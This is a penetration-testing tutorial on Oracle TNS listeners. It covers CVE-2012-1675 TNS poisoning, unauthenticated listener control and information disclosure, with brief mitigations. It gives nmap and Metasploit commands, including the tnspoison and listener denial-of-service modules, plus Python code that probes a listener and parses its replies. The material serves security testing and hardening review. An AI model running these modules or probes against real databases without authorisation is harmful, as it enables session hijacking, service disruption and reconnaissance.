Oracle TNS Listener - Port 1521,1522-1529
Basic info
Oracle databases are widely used across industries for storing sensitive enterprise data. However, their exposure to the network, especially via the Transparent Network Substrate (TNS) listener, can introduce serious security risks. Oracle TNS operates over default port 1521, but in complex environments you may encounter instances on 1522-1529 or even beyond. This article provides in-depth techniques for enumerating, exploiting, and securing Oracle TNS listeners, with real-world examples and practical commands.
1. Understanding Oracle TNS and Default Ports
What is TNS?
TNS (Transparent Network Substrate) is Oracle's proprietary protocol that enables communication between Oracle clients and databases across a network. It allows connections, sessions, and commands like CONNECT, DATA, RESOLVE, etc., to flow through Oracle listeners.
Default Ports
1521: primary default listener port
1522-1529: often used for additional listeners, RAC (Real Application Clusters), or other configured services
In real-world Oracle deployments, multiple listener processes may be used for load balancing, high availability, or segregation of duties across applications.
2. Common Vulnerabilities in TNS Listeners
2.1. CVE-2012-1675: TNS Poison Attack
Description: A critical vulnerability allowing attackers to hijack database sessions by registering rogue services with the listener.
Impact: MITM attacks, data exfiltration, and full control over database traffic.
Mitigation: Use VALID_NODE_CHECKING_REGISTRATION = YES and restrict registration IPs.
2.2. No Listener Authentication
Many Oracle listeners are deployed with no password or authentication, allowing unauthenticated attackers to:
View service names
Stop, start, or reload the listener
Perform Denial-of-Service (DoS) attacks
2.3. Information Disclosure via Listener STATUS
An attacker can send a STATUS command to retrieve:
Hostnames
Service names
Instance names
Database version
3. Enumeration Techniques
3.1. Nmap Scanning
Start by identifying open ports and checking for Oracle services.
nmap -sV -p 1521-1529 <target_ip>
Use the Oracle-specific NSE script:
nmap -p 1521 --script oracle-tns-version <target_ip>
3.2. Checking with Metasploit
msfconsole
use auxiliary/admin/oracle/tnslsnr_version
set RHOSTS <target_ip>
set RPORT 1521
run
Output reveals the listener version, hostname, and Oracle SID.
3.3. Using TNSping
Oracle client installations come with tnsping:
tnsping <listener_alias>
Alternatively, simulate TNSping with Python or Netcat by sending crafted TNS packets.
3.4. Manual Enumeration Using Telnet or Netcat
nc <target_ip> 1521
Send raw TNS packets:
\x00\x00\x00\x36\x01\x00\x00\x00\x01\x36\x01\x2c\x00\x00\x00\x00
You can script this using the Python socket module to brute-force or enumerate SIDs.
4. Exploitation Techniques
4.1. Exploiting the TNS Poison Attack (CVE-2012-1675)
Metasploit Module:
use auxiliary/admin/oracle/tnspoison
set RHOSTS <target_ip>
set RPORT 1521
run
Warning: This module may crash the listener or disrupt sessions. Use only in lab or authorized environments.
4.2. Exploiting Unauthenticated Listener Control
If listener commands like STATUS, STOP, or RELOAD are unauthenticated:
use auxiliary/admin/oracle/tnslsnr_version
use auxiliary/admin/oracle/tnslsnr_service
You can perform a Denial-of-Service:
use auxiliary/dos/oracle/tnslsnr_dos
5. Custom Python Script to Enumerate Listener Services
import socket

def build_tns_connect(connect_data=b""):
    # TNS CONNECT packet: 8-byte header, 50-byte connect body, then the connect string at offset 58
    body = (b"\x01\x36\x01\x2c"                  # protocol version 310, lowest compatible version 300
            b"\x00\x00\x08\x00\x7f\xff\x7f\x08"  # service options, SDU 2048, TDU 32767, NT characteristics
            b"\x00\x00\x00\x01"                  # max packets before ACK, byte-order marker (value of one)
            + len(connect_data).to_bytes(2, "big") + b"\x00\x3a"  # connect data length and offset (58)
            + b"\x00" * 30)                      # max receivable data, flags, trace ids, padding
    length = 8 + len(body) + len(connect_data)   # the header length field must match the bytes actually sent
    return length.to_bytes(2, "big") + b"\x00\x00\x01\x00\x00\x00" + body + connect_data

def send_tns_probe(ip, port):
    tns_pkt = build_tns_connect()   # empty connect data: the listener still replies, so the probe shows it is alive
    try:
        with socket.create_connection((ip, port), timeout=3) as s:
            s.sendall(tns_pkt)
            response = s.recv(1024)
        print(f"[+] Response from {ip}:{port}:\n{response.hex()}")
        return response
    except OSError as e:   # covers connection refused, unreachable host and the 3-second timeout
        print(f"[-] Failed to connect to {ip}:{port} - {e}")
        return None

send_tns_probe("10.0.0.25", 1523)
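Once the probe returns bytes, the next step is to read them. The parser below is an added example, not code from the original article: it classifies the listener's reply by TNS packet type, extracts the (KEY=VALUE) fields that a REFUSE, REDIRECT or ACCEPT reply carries, and decodes VSNNUM, the numeric field in which the listener discloses its version (this is the field behind the version output of the tools listed above). The sample REFUSE reply is constructed for offline testing; its reason bytes and error text are assumptions, not a capture.

```python
import re

# TNS packet types found in byte 4 of the 8-byte header
TNS_TYPES = {1: "CONNECT", 2: "ACCEPT", 3: "ACK", 4: "REFUSE", 5: "REDIRECT",
             6: "DATA", 7: "NULL", 9: "ABORT", 11: "RESEND", 12: "MARKER"}

def decode_vsnnum(vsnnum):
    # VSNNUM is a decimal string whose hex digits carry the version: 202375680 = 0x0C100200 -> 12.1.0.2.0
    v = int(vsnnum)
    return f"{v >> 24 & 0xff}.{v >> 20 & 0xf}.{v >> 16 & 0xf}.{v >> 8 & 0xff}.{v & 0xff}"

def parse_tns_reply(data):
    if len(data) < 8:
        raise ValueError("reply shorter than a TNS header")
    length = int.from_bytes(data[:2], "big")
    if length == 0:  # protocol >= 315 uses a 4-byte length instead of length + checksum
        length = int.from_bytes(data[:4], "big")
    ptype = data[4]
    payload = b""
    if ptype == 4:    # REFUSE: user reason(1), system reason(1), data length(2), data
        dlen = int.from_bytes(data[10:12], "big")
        payload = data[12:12 + dlen]
    elif ptype == 5:  # REDIRECT: data length(2), data
        dlen = int.from_bytes(data[8:10], "big")
        payload = data[10:10 + dlen]
    elif ptype == 2:  # ACCEPT: version, options, SDU, TDU, value-of-one, data length(2), data offset(2)
        dlen = int.from_bytes(data[18:20], "big")
        off = int.from_bytes(data[20:22], "big")
        payload = data[off:off + dlen]
    # innermost (KEY=VALUE) pairs of the connect-descriptor style text
    fields = {k.decode(): v.decode() for k, v in re.findall(rb"\((\w+)=([^()]*)\)", payload)}
    result = {"type": TNS_TYPES.get(ptype, f"UNKNOWN({ptype})"), "length": length, "fields": fields}
    if "VSNNUM" in fields:
        result["version"] = decode_vsnnum(fields["VSNNUM"])
    return result

def build_refuse(description):
    # Constructed REFUSE reply for offline testing (not a real capture): header, reason bytes, length, text
    body = b"\x22\x00" + len(description).to_bytes(2, "big") + description
    return (8 + len(body)).to_bytes(2, "big") + b"\x00\x00\x04\x00\x00\x00" + body

SAMPLE_REFUSE = build_refuse(
    b"(DESCRIPTION=(TMP=)(VSNNUM=202375680)(ERR=12514)(ERROR_STACK=(ERROR=(CODE=12514)(EMFI=4))))")

if __name__ == "__main__":
    print(parse_tns_reply(SAMPLE_REFUSE))
```

Run against your own listeners, this shows exactly which fields an unauthenticated client receives before any credential is checked, which is what a hardening review wants to minimise.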